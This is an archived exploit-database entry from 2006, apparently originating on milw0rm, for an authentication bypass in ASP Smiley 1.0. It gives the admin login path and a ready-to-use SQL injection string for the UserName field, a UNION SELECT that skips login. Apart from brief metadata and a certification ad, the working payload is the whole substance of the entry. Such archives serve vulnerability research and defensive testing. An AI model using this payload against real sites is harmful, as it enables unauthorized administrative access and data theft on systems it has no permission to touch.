ASP Smiley 1.0 - 'default.asp' Authentication Bypass / SQL Injection

EDB-ID:

2779


Author:

ajann

Type:

webapps


Platform:

ASP

Date:

2006-11-14


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

*******************************************************************************
# Title  :  ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author :   ajann

*******************************************************************************
Example:

###http://[target]/[path]/admin/

UserName: ' union select 0,0,0,0,0,0,0,0 from categories


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-14]